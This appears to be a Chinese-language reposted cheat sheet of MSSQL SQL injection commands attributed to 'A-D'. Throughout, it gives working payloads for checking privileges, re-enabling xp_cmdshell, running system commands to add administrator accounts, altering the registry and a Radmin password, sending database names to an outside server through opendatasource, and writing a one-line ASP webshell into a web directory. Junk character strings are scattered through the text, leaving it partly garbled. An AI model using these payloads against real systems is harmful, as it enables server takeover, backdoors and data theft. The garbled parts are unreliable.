阿Ｄ常用的一些注入命令

admin

阿Ｄ常用的一些注入命令
1 C2 ?1 @( ]. ?5 N; v//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
! f* e5 U$ w9 }. h
//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --

! P( T& F! X1 I# ^4 U8 o# C$ H
: Q8 o5 p, y( F5 r/ w' L数字类型
6 n" q# Q% I4 p' K, o4 i! Vand char(124)%2Buser%2Bchar(124)=0

( D9 C0 j6 d4 e字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='
) w# @% e2 P- E
搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='

0 G7 U1 S* C' ?6 u爆用户名
/ v; c4 N: _- {+ Jand user>0
' and user>0 and ''='
7 A$ O( N5 @- H5 {6 L
/ ~/ l* T2 l2 s: R检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
" M9 _& z, T& Q3 D- Y4 j9 ^' p
  V+ u* [% A6 M: f+ X检测是不是MSSQL数据库
. M" @2 Z) O: D; v4 |' H: x$ |7 s  Nand exists (select * from sysobjects);--
! P5 h2 j* D/ c! `- P' T8 K# K6 F
; t! H; J" s% z' o% W( J% R; g检测是否支持多行
;declare @d int;--

% l) f7 M" R/ ?6 _5 x恢复 xp_cmdshell
8 t3 B# X' Y# L- l8 _;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--

: H8 S6 n1 w; n9 c  a; w1 {
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

  V1 D0 O0 {6 g//-----------------------
//      执行命令
//-----------------------
" s' T4 K0 I7 Z+ R/ T+ `" _! a# ~# L首先开启沙盘模式：
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
% C; i6 C3 n9 p  ]
! S% B* M- L6 ^) |) d* U, n3 p9 w7 E然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
+ F7 s8 K- ?3 W7 F+ w% L  q9 q7 j
执行命令
# S" x' j2 d- T( K2 G1 o6 x;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--

* s# W  K- C  M) |1 v# cEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
6 P* G9 A( s" J* P+ q, k( I
判断xp_cmdshell扩展存储过程是否存在：
- M' N9 h8 z  f# n. P& Phttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
$ M; @+ E/ p, U3 [  T
9 ]" `3 y$ l5 d3 M0 ^写注册表
9 \4 U- x* v- o& j: l, P  r' Nexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

REG_SZ
3 n1 A( c* n! b! P, b
2 f" K# h& \3 c. m3 L读注册表
2 X1 \4 N1 d& T/ z7 L2 Gexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
/ x, D$ y4 [* W& V
/ M; {6 f( l7 f. T. ]! Q读取目录内容
exec master..xp_dirtree 'c:\winnt\system32\',1,1

' z$ T# f* |/ j  d1 u
# d- G6 D# n6 \* t# l* d数据库备份
backup database pubs to disk = 'c:\123.bak'

//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--



4 f: U5 K5 F* g, k: A* h更改sa口令方法：用sql综合利用工具连接后，执行命令：
exec sp_password NULL,'新密码','sa'

添加和删除一个SA权限的用户test：
; x2 ^# \8 e) X: xexec master.dbo.sp_addlogin test,ptlove
) z1 {4 @! P( O' R; Y& F) nexec master.dbo.sp_addsrvrolemember test,sysadmin

删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'
  K3 g7 Z! T7 n2 e8 j
添加扩展存储过过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public


停掉或激活某个服务。
: ~7 w3 D0 B$ B$ K% f  A
exec master..xp_servicecontrol 'stop','schedule'
8 r( `# _, s+ z5 ]3 G6 t2 \) T+ Iexec master..xp_servicecontrol 'start','schedule'
3 ?3 f3 e4 T4 o& e. a* r
dbo.xp_subdirs

只列某个目录下的子目录。
: c8 T4 Z2 K& exp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
2 y) U: k0 u  W5 T/ [
0 O% m; Z0 C2 f2 o/ J  Bdbo.xp_makecab

9 ]) f) T" s$ Q' J; w将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

dbo.xp_makecab
: b  j  k$ Z! `8 n' y'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
: }6 x+ ^) d: q' D'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

3 `1 F8 B! m0 d6 dxp_terminate_process

  S9 g1 p- u3 [- y2 v停掉某个执行中的程序，但赋予的参数是 Process ID。
8 u* [' C( `2 N: r. F利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID
* O3 J, l8 e8 s* p
5 E. W7 }& e7 l; s7 Z. v' J& Q3 ]xp_terminate_process 2484

xp_unpackcab
- K; D$ Y, L# d0 L; m& z: P
0 [' q* A' e# f9 [8 l, B2 @# ^' ~解开压缩档。
0 A) i: U! Y7 S& a
. r+ d, k3 V- W( u1 x& `+ L; cxp_unpackcab 'c:\test.cab','c:\temp',1
6 S3 y6 ~5 h# r9 g5 n( D
! a/ |! v) W. P' U% _
6 ^* R! g, T8 i: \. s6 h; s" K  S$ O某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234

create database lcx;
" w5 W2 e3 S( b+ n: Z; T4 PCreate TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);
5 ]! q4 F+ L4 ?0 A& m& q/ Z# W
% s6 J: w' x: P5 T7 X//得到数据库名
& ^* F3 k3 p- `% g" N3 K2 T* C7 ~insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
' L- R) G7 d9 p5 T1 f9 G

//在Master中创建表，看看权限怎样
' d+ `& t9 P4 k1 ECreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

. {* ]( H6 T" c! i! i4 A) K用 sp_makewebtask直接在web目录里写入一句话马：
* u$ v2 O( h0 bhttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
: L  D, B5 O" }& o$ y( W1 |
//更新表内容
Update films SET kind = 'Dramatic' Where id = 123
/ A4 ?; u4 J' h4 e* X
//删除内容
/ p+ p6 F; _# \, j3 f5 X9 fdelete from table_name where Stockid = 3